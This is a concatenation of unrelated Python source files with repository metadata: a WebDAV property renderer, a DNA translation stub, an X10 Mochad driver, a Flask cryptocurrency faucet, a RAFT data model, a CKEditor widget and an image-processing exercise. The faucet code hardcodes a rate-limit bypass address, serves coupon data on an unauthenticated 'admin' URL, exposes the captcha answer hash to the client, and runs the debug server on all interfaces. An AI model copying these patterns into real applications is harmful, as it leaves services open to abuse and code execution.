for ns, props in self.avail_props.items():
attr_name = 'a%s' % count
if ns is not None and ns != self.default_ns:
count += 1
prop.setAttribute('xmlns:%s' % attr_name, ns)
for p in props:
el = resp.createElement(p)
prop.appendChild(el)
if ns is not None and ns != self.default_ns:
el.setAttribute('xmlns', attr_name)
re.lastChild.appendChild(resp.createElement('status'))
re.lastChild.lastChild.appendChild(
resp.createTextNode('HTTP/1.1 200 OK'))
def _handlePropvalues(self, source, resp):
if not source:
_props = self._handleAllprop()
else:
_props = self._handleProp(source)
avail, not_avail = self._propertyResolver(_props)
if avail:
self._renderAvail(avail, resp, _props)
if not_avail:
self._renderNotAvail(not_avail, resp)
def _propertyResolver(self, _props):
avail = {}
not_avail = {}
for ns in _props.keys():
iface = _props[ns]['iface']
for p in _props[ns]['props']:
if iface is None:
# The opaque property case
if (self.oprops is not None and
self.oprops.get(ns, {}).has_key(p)):
l = avail.setdefault(ns, [])
l.append(p)
else:
l = not_avail.setdefault(ns, [])
l.append(p)
continue
# The registered namespace case
adapter = iface(self.context, None)
if adapter is None:
# Registered interface but no adapter? Maybe log this?
l = not_avail.setdefault(ns, [])
l.append(p)
continue
l = avail.setdefault(ns, [])
l.append(p)
return avail, not_avail
def _renderAvail(self, avail, resp, _props):
re = resp.lastChild.lastChild
re.appendChild(resp.createElement('propstat'))
prop = resp.createElement('prop')
re.lastChild.appendChild(prop)
re.lastChild.appendChild(resp.createElement('status'))
re.lastChild.lastChild.appendChild(
resp.createTextNode('HTTP/1.1 200 OK'))
count = 0
for ns, props in avail.items():
attr_name = 'a%s' % count
if ns is not None and ns != self.default_ns:
count += 1
prop.setAttribute('xmlns:%s' % attr_name, ns)
iface = _props[ns]['iface']
if not iface:
# The opaque properties case, hand it off
for name in props:
self.oprops.renderProperty(ns, attr_name, name, prop)
continue
# The registered namespace case
initial = {}
adapted = iface(self.context)
for name, field in getFields(iface).items():
try:
value = field.get(adapted)
except AttributeError:
# Interface says the attribute exists but it
# couldn't be found on the adapted object.
value = field.missing_value
if value is not field.missing_value:
initial[name] = value
setUpWidgets(self, iface, IDAVWidget, ignoreStickyValues=True,
initial=initial, names=initial.keys())
for p in props:
el = resp.createElement('%s' % p )
if ns is not None and ns != self.default_ns:
el.setAttribute('xmlns', attr_name)
prop.appendChild(el)
widget = getattr(self, p + '_widget', None)
if widget is None:
# A widget wasn't generated for this property
# because the attribute was missing on the adapted
# object, which actually means that the adapter
# didn't fully implement the interface ;(
el.appendChild(resp.createTextNode(''))
continue
value = widget()
if isinstance(value, (unicode, str)):
# Get the widget value here
el.appendChild(resp.createTextNode(value))
else:
if proxy.isinstance(value, minidom.Node):
el.appendChild(
el.ownerDocument.importNode(value, True))
else:
# Try to string-ify
value = str(widget)
# Get the widget value here
el.appendChild(resp.createTextNode(value))
def _renderNotAvail(self, not_avail, resp):
re = resp.lastChild.lastChild
re.appendChild(resp.createElement('propstat'))
prop = resp.createElement('prop')
re.lastChild.appendChild(prop)
re.lastChild.appendChild(resp.createElement('status'))
re.lastChild.lastChild.appendChild(
resp.createTextNode('HTTP/1.1 404 Not Found'))
count = 0
for ns, props in not_avail.items():
attr_name = 'a%s' % count
if ns is not None and ns != self.default_ns:
count += 1
prop.setAttribute('xmlns:%s' % attr_name, ns)
for p in props:
el = resp.createElement('%s' % p )
prop.appendChild(el)
if ns is not None and ns != self.default_ns:
el.setAttribute('xmlns', attr_name)
|
UTF-8
|
Python
| false | false | 2,012 |
3,049,426,820,324 |
8bafabec28a5a5f943a09ede760ab17161032348
|
84b28c50477d142d620c9a3d092030ce1a426aeb
|
/lab1/src/translate.py
|
a70dd9dcd04dbb0e909ce63c1ca9e507fdead0d7
|
[] |
no_license
|
brainstorm/biobits
|
https://github.com/brainstorm/biobits
|
5317162e1379ca2e78a16039a64cd7eb40bb1629
|
57b01aec6c54994bd5ec3291c26e9691b8f2b91d
|
refs/heads/master
| 2015-08-06T06:28:04.795328 | 2010-04-06T23:16:04 | 2010-04-06T23:16:04 | 597,797 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
'''
Created on Nov 3, 2009
@author: romanvg
@co-author: hassanfa
Interesting read: http://en.wikipedia.org/wiki/Codon
'''
import re
import read_fasta
codon_table= {'ATT':'I','ATC':'I','ATA':'I',
'CTT':'L','CTC':'L','CTA':'L','CTG':'L','TTA':'L','TTG':'L',
'GTT':'V','GTC':'V','GTA':'V','GTG':'V',
'TTT':'F','TTC':'F',
'ATG':'M',
'TGT':'C','TGC':'C',
'GCT':'A','GCC':'A','GCA':'A','GCG':'A',
'GGT':'G','GGC':'G','GGA':'G','GGG':'G',
'CCT':'P','CCC':'P','CCA':'P','CCG':'P',
'ACT':'T','ACC':'T','ACA':'T','ACG':'T',
'TCT':'S','TCC':'S','TCA':'S','TCG':'S','AGT':'S','AGC':'S',
'TAT':'Y','TAC':'Y',
'TGG':'W',
'CAA':'Q','CAG':'Q',
'AAT':'N','AAC':'N',
'CAT':'H','CAC':'H',
'GAA':'E','GAG':'E',
'GAT':'D','GAC':'D',
'AAA':'K','AAG':'K',
'CGT':'R','CGC':'R','CGA':'R','CGG':'R','AGA':'R','AGG':'R',
'TAA':'STOP','TAG':'STOP','TGA':'STOP'
}
def translateDna(file):
for k, v in file.iteritems():
if k == "stopcodons":
countStopCodons(v)
elif k == "ambiguities":
ambiguities(v)
elif re.match('proteinalphabet\d+', k):
alphabet(v)
def countStopCodons(codons):
# "amber", "ochre" and "opal" respectively
stopcodons = ['TAG', 'TAA', 'TGA']
#stopcodons never stop, when they started, you looser!
# substitutes stopcodons by symbol X
# m = re.findall("(\S{1,60})", v)
def ambiguities(amb):
ambig = "N"
def alphabet(alpha):
pass
if __name__ == '__main__':
translateDna(read_fasta.read_file("../data/translationtest.dna"))
|
UTF-8
|
Python
| false | false | 2,010 |
19,069,654,832,401 |
897e2a0b5311c0c92cc0a5d894b9d1f81c4daf14
|
e5e28f4069ea4eacc8dd485d95192fe8db17440b
|
/pytomation/interfaces/mochad.py
|
9334813f99c67e2e5e486105006ac41939ad4d01
|
[] |
no_license
|
vesquam/pytomation
|
https://github.com/vesquam/pytomation
|
d0720481e4904cd351f6a6c1fdbb4886adbc8432
|
f0358eb6c7963cc7977b3c570c1d35427ac5b9f5
|
refs/heads/master
| 2021-05-27T22:12:48.020704 | 2014-08-06T04:26:53 | 2014-08-06T04:26:53 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#from .common import *
#from pytomation.devices import StateDevice, InterfaceDevice, State
from .common import Command
from .ha_interface import HAInterface
from pytomation.devices import State
'''
Mochad Driver Reference:
http://sourceforge.net/apps/mediawiki/mochad/index.php?title=Mochad_Reference
switched pl method for rf as both the cm19a only supports rf while the cm14a
supports both pl and rf
'''
class Mochad(HAInterface):
VERSION = '0.3.0'
def _init(self, *args, **kwargs):
self._devicestatus = False
self._securitystatus = False
super(Mochad, self)._init(*args, **kwargs)
def _readInterface(self, lastPacketHash):
raw_response = self._interface.read()
if len(raw_response) == 0: # if no data leave
return
response_lines = raw_response.split('\n')
self._logger.debug('Number of Lines ' + str(len(response_lines)))
for line in response_lines:
if line.strip() == '':
return # leave if empty
self._logger.debug('line responses> ' + line)
line_data = line.split(' ')
if line_data[2] == 'Rx' or line_data[2] == 'Tx':
""" Like below
01/27 23:41:23 Rx RF HouseUnit: A3 Func: Off
0 1 2 3 4 5 6 7
01/27 23:48:23 Rx RF HouseUnit: A1 Func: On
12/07 20:49:37 Rx RFSEC Addr: C6:1B:00 Func: Motion_alert_MS10A
0 1 2 3 4 5 6 7
06/06 21:08:56 Tx PL HouseUnit: A2
06/06 21:08:56 Tx PL House: A Func: Off
"""
#date=data[0]
#time=data[1]
#direction=data[2]
#method=data[3]
#ua=data[4]
addr = line_data[5]
# removing _devicemodel
func = line_data[7].strip().rsplit('_', 1)[0]
self._map(func, addr)
"""
command sent > st
02/01 16:44:23 Device selected
02/01 16:44:23 House A: 2
02/01 16:44:23 House B: 1
02/01 16:44:23 Device status
02/01 16:44:23 House A: 1=0,2=0,3=0,4=1,5=1,6=1,7=1,8=1,10=0,11=0
0 1 2 3 4
02/01 16:44:23 Security sensor status
02/01 16:44:23 Sensor addr: 000003 Last: 1102:40 Arm_KR10A
02/01 16:44:23 Sensor addr: 000093 Last: 1066:33 Disarm_SH624
02/01 16:44:23 Sensor addr: 055780 Last: 1049:59 Contact_alert_max_
02/01 16:44:23 Sensor addr: 27B380 Last: 01:42 Motion_normal_MS10A
02/01 16:44:23 Sensor addr: AF1E00 Last: 238:19 Lights_Off_KR10A
0 1 2 3 4 5 6 7
02/01 16:44:23 End status
"""
if line_data[2] == 'Device':
if line_data[3] == 'status':
self._devicestatus = True
continue
if line_data[2] == 'Security':
if line_data[3] == 'sensor':
self._devicestatus = False
self._securitystatus = True
continue
if line_data[2] == 'End':
self._devicestatus = False # Forcing false
self._securitystatus = False
continue
if self._devicestatus:
housecode = line_data[3].strip(":")
for device in line_data[4].split(','):
qdevicestatus = device.split('=')
if qdevicestatus[1] == '0':
self._onCommand(command=Command.OFF,
address=str(housecode
+ qdevicestatus[0]))
if qdevicestatus[1] == '1':
self._onCommand(command=Command.ON,
address=str(housecode
+ qdevicestatus[0]))
if self._securitystatus:
addr = line_data[4]
func = line_data[7].rsplit('_', 1)[0]
self._logger.debug(
"Function: " + func
+ " Address "
+ addr[0:2]
+ ":" + addr[2:4]
+ ":" + addr[4:6])
# adding in COLONs
self._map(func,
addr[0:2] + ":" + addr[2:4] + ":" + addr[4:6])
def status(self, address):
self._logger.debug('Querying of last known status '
+ ' of all devices including '
+ address)
self._interface.write('st' + "\x0D")
return None
def update_status(self):
self._logger.debug('Mochad update status called')
self.status('')
def _onCommand(self, command=None, address=None):
commands = command.split(' ')
if commands[0] == 'rf':
address = commands[1]
command = commands[2][0:len(commands[2]) - 1]
self._logger.debug('Command>' + command + ' at ' + address)
super(Mochad, self)._onCommand(command=command, address=address)
""" #Causes issues with web interface Disabling this feature.
def __getattr__(self, command):
return lambda address: self._interface.write(
'rf ' + address + ' ' + command + "\x0D" )
"""
def on(self, address):
self._logger.debug('Command on at ' + address)
self._interface.write('rf ' + address + ' on' + "\x0D")
def off(self, address):
self._logger.debug('Command off at ' + address)
self._interface.write('rf ' + address + ' off' + "\x0D")
def disarm(self, address):
self._logger.debug('Command disarm at ' + address)
self._interface.write('rfsec ' + address + ' disarm' + "\x0D")
def arm(self, address):
self._logger.debug('Command arm at ' + address)
self._interface.write('rfsec ' + address + ' arm' + "\x0D")
def version(self):
self._logger.info("Mochad Pytomation Driver version " + self.VERSION)
def _map(self, func, addr): # mapping output to a valid command
if func == "On":
self._onCommand(command=Command.ON, address=addr)
elif func == "Off":
self._onCommand(command=Command.OFF, address=addr)
elif func == "Contact_normal_min":
self._onState(state=State.CLOSED, address=addr)
elif func == "Contact_alert_min":
self._onState(state=State.OPEN, address=addr)
elif func == "Contact_normal_max":
self._onState(state=State.CLOSED, address=addr)
elif func == "Contact_alert_max":
self._onState(state=State.OPEN, address=addr)
elif func == "Motion_alert":
self._onState(state=State.MOTION, address=addr)
elif func == "Motion_normal":
self._onState(state=State.STILL, address=addr)
# TODO: Add security states.
#elif func == "Arm":
# self._onState(state=State.ON, address=addr)
#elif func == "Panic":
# self._onState(state=State.VACATE, address=addr)
#elif func == "Disarm":
# self._onState(state=State.DISARM, address=addr)
#elif func == "Lights_On":
# self._onCommand(command=Command.ON, address=addr)
#elif func == "Lights_Off":
# self._onCommand(command=Command.OFF, address=addr)
|
UTF-8
|
Python
| false | false | 2,014 |
3,513,283,249,066 |
94d1d5c2deaf40f6a221452d737ea8c0c3693425
|
01481aadcc6df89b2493969a1cd226e6cb5d68a7
|
/CryptoTap.py
|
adfa80a34a485c266545238aaa9128d71c6a8600
|
[] |
no_license
|
techtronics/trcfaucet
|
https://github.com/techtronics/trcfaucet
|
487d394e79febbb1afae83367588a515338b6450
|
463b3d69b40c206acdecf25c0d087b774a80bf52
|
refs/heads/master
| 2018-01-13T20:05:17.223616 | 2013-09-25T00:05:49 | 2013-09-25T00:05:49 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import re
import sys
import sqlite3
import hashlib
from random import randint
from datetime import datetime
from flask import g
from flask import Flask
from flask import url_for
from flask import request
from flask import redirect
from flask import render_template
from contextlib import closing
import logging
from logging import Formatter
from logging.handlers import RotatingFileHandler
# Load Flask -------------------------------------------------------------------
app = Flask(__name__)
app.config.from_pyfile('settings.cfg')
# Database Functions -----------------------------------------------------------
def connect_db():
return sqlite3.connect(app.config['DATABASE_FILE'])
@app.before_request
def before_request():
g.db = connect_db()
@app.teardown_request
def teardown_request(exception):
if hasattr(g, 'db'):
g.db.close()
def init_db():
with closing(connect_db()) as db:
with app.open_resource(app.config['DATABASE_INIT'], mode='r') as f:
db.cursor().executescript(f.read())
db.commit()
# Affiliate System -------------------------------------------------------------
class Affiliate:
def __init__(self):
pass
# API System -------------------------------------------------------------------
class API:
def __init__(self):
pass
# Classes ----------------------------------------------------------------------
class DripRequest:
"""
Stores a users terracoin send request.
Data Members:
address -- Terracoin address to send the transaction to.
coupon -- Special code that allows users to get additional coins.
ip -- The IP address that the request was made from.
drip_id -- The database id of the drip request.
"""
# Magics -------------------------------------------------------------------
def __init__(self, address, coupon, ip, drip_id = 0):
# Validate all input
if not self.validate_address(address):
errmsg = 'Invalid {0} Address'.format(app.config['COIN_NAME'])
raise ValueError(errmsg)
elif not self.validate_coupon(coupon):
coupon = 'INVALID'
elif not self.validate_ip(ip):
raise ValueError('Invalid IP')
# Cast everything
self.address = str(address)
self.coupon = str(coupon).upper()
self.ip = str(ip)
self.drip_id = int(drip_id)
def __str__(self):
"""Object to string for easy debugging."""
text = '{0} {1} {2} {3}'
return text.format(self.address, self.coupon, self.ip, self.drip_id)
# Validation and Clean Functions -------------------------------------------
def clean(self, in_str):
"""Strips out chars that are not alphanumeric."""
pattern = re.compile('[\W_]+')
return pattern.sub('', str(in_str))
def validate_address(self, address):
"""
Does simple validation of a bitcoin-like address.
Source: http://bit.ly/17OhFP5
param : address : an ASCII or unicode string, of a bitcoin address.
returns : boolean, indicating that the address has a correct format.
"""
address = self.clean(address)
# The first character indicates the "version" of the address.
CHARS_OK_FIRST = "123"
# alphanumeric characters without : l I O 0
CHARS_OK = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# We do not check the high length limit of the address.
# Usually, it is 35, but nobody knows what could happen in the future.
if len(address) < 27:
return False
elif address[0] not in CHARS_OK_FIRST:
return False
# We use the function "all" by passing it an enumerator as parameter.
# It does a little optimization :
# if one of the character is not valid, the next ones are not tested.
return all( ( char in CHARS_OK for char in address[1:] ) )
def validate_coupon(self, coupon):
"""Makes sure the coupon is alphanumeric and less than 12 chars."""
coupon = self.clean(coupon)
return re.match('^[\w]+$', coupon) and len(coupon)<12
def validate_ip(self, ip):
"""Checks for a valid IP address."""
return re.match('([0-9]{1,3}\.){3}[0-9]+', str(ip))
# Database Methods ---------------------------------------------------------
def count_unique(self, row, val):
"""Count the number of unique row for a particular value."""
if row == 'ip':
query = "SELECT Count(*) FROM drip_request WHERE ip=?"
elif row == 'address':
query = "SELECT Count(*) FROM drip_request WHERE address=?"
cur = g.db.execute(query, (val,))
return int(cur.fetchone()[0])
def last_request(self, val):
"""Return the number of minutes since the last drip request."""
last_request(val)
def save_db(self):
"""Insert object data into database."""
query = "INSERT INTO drip_request"
query += "(id, crdate, ip, address, coupon, trans_id)"
query += "VALUES (NULL, datetime('now','localtime'), ?, ?, ?, ?)"
g.db.execute(query, (self.ip, self.address, self.coupon, "UNSENT",))
g.db.commit()
def save(self):
"""Save drip request into database."""
num_ip = self.count_unique("ip", self.ip)
num_address = self.count_unique("address", self.address)
last_req = last_request(self.ip)
app.logger.debug("last_req:" + str(last_req))
# testing address - remove before production
if self.address == '12Ai7QavwJbLcPL5XS276fkYZpXPXTPFC7':
self.save_db()
elif last_req >= app.config['REQUEST_TIME_LIMIT']:
app.logger.info('Last Submit Time: '.format(last_req))
self.save_db()
elif num_address >= app.config['MAX_DRIPS']:
raise LookupError("Reached MAX_DRIPS.")
elif num_ip >= app.config['MAX_DRIPS']:
raise LookupError("Reached MAX_DRIPS.")
else: # last_req < request time limit
self.time_left = app.config['REQUEST_TIME_LIMIT'] - last_req
raise LookupError("Timelimit error.")
return self
def send(self):
return(self.address, self.coupon)
# Helper Functions -------------------------------------------------------------
def last_request(ip):
"""Return the number of minutes since the last drip request by passed ip."""
query = "SELECT * FROM drip_request WHERE ip=? ORDER BY id DESC"
last_req = g.db.execute(query, (ip,)).fetchone()
if last_req == None:
# if no listing found then this is probably the users first time using
# the faucet, so return the default time request limit + 1, so that the
# system will allow them a drip request
return int(app.config['REQUEST_TIME_LIMIT'] + 1)
else:
# convert database string to datetime
req_datetime = datetime.strptime(last_req[1], "%Y-%m-%d %H:%M:%S")
diff_time = datetime.now() - req_datetime
diff_time = divmod(diff_time.total_seconds(), 60)
return int(diff_time[0]) # minutes since last request
def sub_cypher(ip, offset):
"""
A basic number substitution cypher using a number offset. Don't use offset
values 0-9, as then all values will be either 0 or 1. This is used to
obfuscated the IP address before the are publicly displayed.
The cypher is currently easily reversed if the offset is known. Here is
another implementation that was suggested:
rotate((ip % sum1bits(ip) ), sum0bits(ip))
"""
return [(abs(int(x) - offset)%10) if x.isdigit() else '.' for x in ip]
def get_html(save_time, ip, trans_id):
"""Transform database output into a table."""
diff_time = datetime.now()-datetime.strptime(save_time, "%Y-%m-%d %H:%M:%S")
diff_time = divmod(diff_time.total_seconds(), 60)
diff_time = "{0} mins, {1} secs ago".format(int(diff_time[0]), int(diff_time[1]))
obfuscated_ip = ''.join(map(str, sub_cypher(list(ip), 756)))
if trans_id == "UNSENT":
html = "<tr><td>{0}</td><td>{1}</td><td>Processing...</td></tr>"
return html.format(diff_time, obfuscated_ip)
else:
short_trans_id = trans_id[:37] + "..."
trans_url = app.config['BLOCK_EXPLORER_URL'] + trans_id
html = "<tr><td>{0}</td><td>{1}</td><td><a href='{2}'>{3}</a></td></tr>"
return html.format(diff_time, obfuscated_ip, trans_url, short_trans_id)
def get_index(form_submit_status = None):
"""Displays the default index page, or a success / error page."""
# generate and hash the captcha
captcha_raw = (randint(1, 15), randint(1, 15))
captcha = str(int(captcha_raw[0] - captcha_raw[1])).encode('utf-8')
captcha_hash = hashlib.sha1(captcha).hexdigest()
# retrieve last drip requests
query = 'SELECT * FROM drip_request ORDER BY id DESC LIMIT 10'
recent = g.db.execute(query)
recent = [get_html(row[1], row[2], row[5]) for row in recent.fetchall()]
recent = ''.join(map(str, recent))
# find total nunber of transactions
cur = g.db.execute('SELECT Count(*) FROM drip_request')
total_trans = app.config['TOTAL_TRANS'] + int(cur.fetchone()[0])
stats = "{:,}".format(total_trans)
# find time since last drip request
last_req = app.config['REQUEST_TIME_LIMIT']
last_req -= last_request(str(request.remote_addr))
# pass all data to the template for rendering
return render_template('index.html', recent=recent,
form_submit=form_submit_status,
captcha_x=captcha_raw[0], captcha_y=captcha_raw[1],
captcha_awns=captcha_hash, stats=stats,
last_req=last_req)
def get_coupons_html(access_key, coup_value, max_use):
html = "<tr><td>{0}</td><td>{1}</td><td>{2}</td></tr>"
return html.format(access_key, coup_value, max_use)
def get_coupons():
query = 'SELECT * FROM coupon_list'
c = g.db.execute(query)
c = [get_coupons_html(row[3], row[1], row[2]) for row in c.fetchall()]
c = ''.join(map(str, c))
return render_template('coupons.html', coupons=c)
# Routes -----------------------------------------------------------------------
@app.route('/')
def index(): return get_index()
@app.route('/add', methods=['POST'])
def add():
# grab data
ip = str(request.remote_addr)
address = request.form['address']
coupon = request.form['coupon']
try:
# convert user submitted captcha to an sha-1 hash
# since the captcha is passed through a hidden input we need to obscure
# the answer from the user. we do this by hashing the solution.
captcha = str(request.form['captcha']).encode('utf-8')
captcha_user = hashlib.sha1(captcha).hexdigest()
captcha_awn = request.form['captcha_awns']
# compare sha-1 hash of correct captcha and user submitted solution
if not captcha_user == captcha_awn:
app.logger.info('Invalid Captcha from {0}'.format(ip))
raise ValueError("Invalid captcha")
# TODO: salting also needs to be added as the user could simply modify
# the html and insert a hash they know the answer to
# create a drip request object. the constructor will validate the
# input before adding the drip request to the database
drip = DripRequest(address, coupon, ip)
app.logger.info("Good drip: {0}".format(drip.save()))
return redirect(url_for('good'))
except ValueError as e:
app.logger.info("Bad Address: {0} from {1}".format(address, ip))
app.logger.info("Error Detail: {0}".format(e))
return redirect(url_for('bad'))
except LookupError as e:
app.logger.info("Duplicate Address: {0} from {1}".format(address, ip))
app.logger.info("Error Detail: {0}".format(e))
return redirect(url_for('duplicate'))
except:
# ValueError and LookupError are raised on purpose, all other
# errors should be considered logical bugs
app.logger.error("Unexplained Error: {0}".format(sys.exc_info()[0]))
return redirect(url_for('bad'))
# submission result pages
@app.route('/good')
def good(): return get_index("good")
@app.route('/bad')
def bad(): return get_index("bad")
@app.route('/duplicate')
def duplicate(): return get_index("duplicate")
# static pages
@app.route('/forum')
def forum(): return render_template('forum.html')
@app.route('/resources')
def resources(): return render_template('resources.html')
@app.route('/guide')
def guide(): return render_template('guide.html')
# admin pages
@app.route('/coupon123')
def coupon123(): return get_coupons()
# Main -------------------------------------------------------------------------
if __name__ == '__main__':
# logging
handler = RotatingFileHandler('foo.log', maxBytes=10000, backupCount=1)
handler.setLevel(logging.DEBUG)
handler.setFormatter(Formatter('%(asctime)s %(levelname)s: %(message)s '
'[in %(pathname)s:%(lineno)d]'))
app.logger.addHandler(handler)
# debug web server
app.run(host='0.0.0.0', port=5000, debug=True)
|
UTF-8
|
Python
| false | false | 2,013 |
5,549,097,753,820 |
4d5eaebfb51ec08e39faad3bc95cb0b4b78169b7
|
bfc874767de27c84f3b61b7b5d0b6a4ee1fefb7f
|
/core/data/SpiderPendingResponsesDataModel.py
|
ee88914eb6e087b42033ac300f2743446c2758c4
|
[
"GPL-3.0-only"
] |
non_permissive
|
pombreda/raft
|
https://github.com/pombreda/raft
|
294774b70d07fb4b7d57fac3ddb92e2681fb6a7f
|
c81c5778a8113e3c7095334ed91dc68352e5da5d
|
refs/heads/master
| 2021-01-01T19:07:04.417738 | 2014-08-12T21:17:50 | 2014-08-12T21:17:50 | 32,209,251 | 1 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#
# This module supports the data model for the spider results
#
# Author: Gregory Fleischer ([email protected])
#
# Copyright (c) 2011 RAFT Team
#
# This file is part of RAFT.
#
# RAFT is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# RAFT is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with RAFT. If not, see <http://www.gnu.org/licenses/>.
#
from core.data.DataTableDataModel import DataTableDataModel
from core.database.constants import SpiderPendingResponsesTable
class SpiderPendingResponsesDataModel(DataTableDataModel):
ITEM_DEFINITION = (
('#', SpiderPendingResponsesTable.RESPONSE_ID),
('Type', SpiderPendingResponsesTable.REQUEST_TYPE),
('Depth', SpiderPendingResponsesTable.DEPTH),
('Status', SpiderPendingResponsesTable.STATUS),
)
def __init__(self, framework, parent = None):
DataTableDataModel.__init__(self, framework, SpiderPendingResponsesDataModel.ITEM_DEFINITION, parent)
|
UTF-8
|
Python
| false | false | 2,014 |
16,389,595,242,273 |
4be3baa702078efa84c3e0ea506ee5f5b6648607
|
895daa2816d6f1ccfc9352e0512a938760fe1ce8
|
/ckeditor/widgets.py
|
25c1f3bc90ad93cb4f04144c48598cb113320eb5
|
[
"BSD-3-Clause"
] |
permissive
|
oysnet/django-ckeditor
|
https://github.com/oysnet/django-ckeditor
|
374ef5da7e211ef4e466bf402eca6f229b35ee4b
|
7a8d39520a0abbce4cf74d49a43f322fb18a449c
|
refs/heads/master
| 2021-01-17T23:05:22.513512 | 2012-10-25T09:46:55 | 2012-10-25T09:46:55 | 1,397,323 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django import forms
from django.conf import settings
from django.core.urlresolvers import reverse
from django.utils.safestring import mark_safe
from django.utils.html import conditional_escape
from django.utils.encoding import force_unicode
from django.utils import simplejson
from django.core.exceptions import ImproperlyConfigured
from django.forms.util import flatatt
from copy import deepcopy
json_encode = simplejson.JSONEncoder().encode
DEFAULT_CONFIG = {
'skin': 'kama',
'toolbar': 'Full',
'height': 291,
'width': 618,
'filebrowserWindowWidth': 940,
'filebrowserWindowHeight': 747,
}
class CKEditorWidget(forms.Textarea):
"""
Widget providing CKEditor for Rich Text Editing.
Supports direct image uploads and embed.
"""
class Media:
try:
js = (
settings.STATIC_URL + 'ckeditor/ckeditor/ckeditor.js',
)
except AttributeError:
raise ImproperlyConfigured("django-ckeditor requires CKEDITOR_MEDIA_PREFIX setting. This setting specifies a URL prefix to the ckeditor JS and CSS media (not uploaded media). Make sure to use a trailing slash: CKEDITOR_MEDIA_PREFIX = '/media/ckeditor/'")
def __init__(self, config_name='default', *args, **kwargs):
super(CKEditorWidget, self).__init__(*args, **kwargs)
# Setup config from defaults.
self.config = DEFAULT_CONFIG
# Try to get valid config from settings.
configs = getattr(settings, 'CKEDITOR_CONFIGS', None)
if configs != None:
if isinstance(configs, dict):
# Make sure the config_name exists.
if configs.has_key(config_name):
config = configs[config_name]
# Make sure the configuration is a dictionary.
if not isinstance(config, dict):
raise ImproperlyConfigured('CKEDITOR_CONFIGS["%s"] setting must be a dictionary type.' % config_name)
# Override defaults with settings config.
self.config = deepcopy(config)
else:
raise ImproperlyConfigured("No configuration named '%s' found in your CKEDITOR_CONFIGS setting." % config_name)
else:
raise ImproperlyConfigured('CKEDITOR_CONFIGS setting must be a dictionary type.')
if self.config.has_key('contentsCss'):
if isinstance(self.config['contentsCss'], (list, tuple)):
self.config['contentsCss'] = [settings.STATIC_URL+css for css in self.config['contentsCss']]
else:
self.config['contentsCss']=settings.STATIC_URL+self.config['contentsCss']
def render(self, name, value, attrs={}):
if value is None: value = ''
final_attrs = self.build_attrs(attrs, name=name)
self.config['filebrowserUploadUrl'] = reverse('ckeditor_upload')
self.config['filebrowserBrowseUrl'] = reverse('ckeditor_browse')
return mark_safe(u'''<textarea%(attr)s>%(value)s</textarea>
<script type="text/javascript">
if(typeof(%(id_s)s_id) === 'undefined') {
%(id_s)s_id = "%(id)s";
%(id_s)s_timer = null;
%(id_s)s_config = %(config)s
} else if (%(id_s)s_timer !== null) {
clearTimeout(%(id_s)s_timer);
}
%(id_s)s_timer = setTimeout( function() {
if (!CKEDITOR.instances[%(id_s)s_id]) {
CKEDITOR.replace(%(id_s)s_id, %(id_s)s_config);
}
%(id_s)s_timer = null;
}, 100);
</script>''' % {'attr':flatatt(final_attrs), 'value':conditional_escape(force_unicode(value)), 'id':final_attrs['id'], 'id_s' :final_attrs['id'].replace('-','_'), 'config':json_encode(self.config)})
|
UTF-8
|
Python
| false | false | 2,012 |
9,620,726,774,181 |
0128c30d3aa632dff87ea4f7d0cb1fab71644bac
|
f1e5d5e9d2286299ace98d120042ab59f1471a8f
|
/CS4495_Computer_Vision/Problem_Set_0/PS0-4/PS0-4-code.py
|
a40c02b868b94f995e43c36914f1a0922536ae44
|
[] |
no_license
|
CardenB/Programming-Assignments
|
https://github.com/CardenB/Programming-Assignments
|
c2c7d8855e5d724bb906ed0f1d1b7f395e0f7e05
|
9225117ab272c916f3107e4ee4dac56a527e68cf
|
refs/heads/master
| 2016-09-08T11:45:44.412431 | 2014-09-26T13:58:26 | 2014-09-26T13:58:26 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import numpy as np
import cv2
import os
def part4(M1g):
minPix = np.amin(M1g)
maxPix = np.amax(M1g)
meanPix = np.mean(M1g)
stdDev = np.std(M1g)
print "min: {0}, max: {1}, mean: {2}, std. dev.: {3}".format(minPix, maxPix, meanPix, stdDev)
#subtract mean from all pixels, divide by std dev, multiply by 10 (if image is 0->255) or 0.05 (if image 0.0->1.0)
#add mean back in, output img
newImg = M1g.copy()
newImg -= meanPix
newImg /= stdDev
if np.amax(newImg) > 1.0:
print "multiplying by 10"
newImg *= 10
else:
print "multiplying by 0.05"
newImg *= 0.05
newImg += meanPix
cv2.imwrite('ps0-4-b-1.png', newImg)
#shift M1g to left by 2 pixels and output img
pixelShift = 2
M1gCopy = M1g.copy()
shiftImg = M1g.copy()
shiftImg[:,:-pixelShift, :] = shiftImg[ :,pixelShift:, :]
shiftImg[-pixelShift:0,:,:] = 0
cv2.imwrite('ps0-4-c-1.png', shiftImg)
#subtract shifted version of M1g from original and make sure values are legal (no negatives)
M1g -= shiftImg
np.clip(M1g, 0, 255)
cv2.imwrite('ps0-4-d-1.png', M1g)
if __name__ == '__main__':
curDir = os.path.dirname(__file__)
fileName1 = os.path.join(curDir, '../PS0-2/ps0-2-b-1.png')
img1 = cv2.imread(fileName1)
part4(img1)
|
UTF-8
|
Python
| false | false | 2,014 |
15,857,019,275,721 |
fd243e3ecf8f0bcaca4e6f28406a2ba207cf9988
|
7ffc46147f4ec7adb79f471cef0f76e5f686a109
|
/src/demo/review.py
|
e8544682c6d3840e386687552d9df2c67565af2f
|
[] |
no_license
|
luoyangylh/FindSpamStore
|
https://github.com/luoyangylh/FindSpamStore
|
c1b1aaef889ac2fbc1c85b2483207c57200e298d
|
c39a173635f7d636a787e7c4a6d46b07659cbec4
|
refs/heads/master
